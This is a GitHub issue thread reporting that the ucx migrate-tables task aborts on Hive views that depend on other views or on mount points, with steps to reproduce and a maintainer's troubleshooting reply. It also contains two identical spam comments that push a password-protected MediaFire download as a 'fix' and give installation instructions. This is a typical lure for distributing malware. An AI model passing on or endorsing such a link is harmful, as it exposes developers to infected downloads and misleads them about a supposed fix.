### ISSUE TITLE
[BUG]: Migrate Views With Dependencies

### ISSUE THREAD

**Issue by wesleyforti** [databrickslabs/ucx#2494]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

Error trying to execute migrate-table task 

`19:32:58 ERROR [databricks.labs.ucx] {MainThread} Execute `databricks workspace export //Applications/ucx/logs/migrate-tables/run-392576937270338-0/migrate_views.log` locally to troubleshoot with more details. Invalid table references are preventing migration: {ViewToMigrate(src=Table(catalog='hive_metastore', database='xxx', name='yyy', object_type='VIEW', table_format='UNKNOWN', location=None `

In my env I have:
- more than 1k views.
- Some of them references at least one other view
- Some of them are created using mount points 

### Expected Behavior

view migrated because ucx codes handles some dependencies or view migration skipped .

Today the process abort instead of skipping and migrating the other views.

### Steps To Reproduce

1. ucx setup 0.33
2. Assessment run - databricks labs ucx ensure-assessment-run
3. Then Table mapping -  databricks labs ucx create-table-mapping
4. Create catalogs and schemas - databricks labs ucx create-catalogs-schemas
5. Then migrate-tables task - databricks labs ucx migrate-tables

### Cloud

Azure

### Operating System

macOS

### Version

latest via Databricks CLI

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nfx** [comment]
@wesleyforti execute `databricks workspace export /Applications/ucx/logs/migrate-tables/run-392576937270338-0/migrate_views.log` locally to troubleshoot with more details
